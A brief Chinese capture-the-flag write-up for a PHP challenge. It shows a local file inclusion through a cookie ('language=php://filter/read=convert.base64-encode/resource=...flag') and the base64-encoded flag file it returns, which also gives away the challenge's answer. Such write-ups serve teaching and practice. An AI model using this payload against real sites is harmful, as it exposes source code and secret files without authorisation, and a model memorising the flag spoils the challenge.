查看页面源代码
发现源代码中能看到php代码,对此解读能了解到,可以在cookie为$lan赋值
进行bp抓包重发,构造payload
Cookie: language=php://filter/read=convert.base64-encode/resource=/var/www/html/flag
得到 PD9waHANCiRmbGFnPSJjeWJlcnBlYWNle2M2M2IyNGYwYmYxYjcwM2U2NzZhMjYxOTM1ODhiNDExfSI7DQo/Pg==
再进行base64解码
得到flag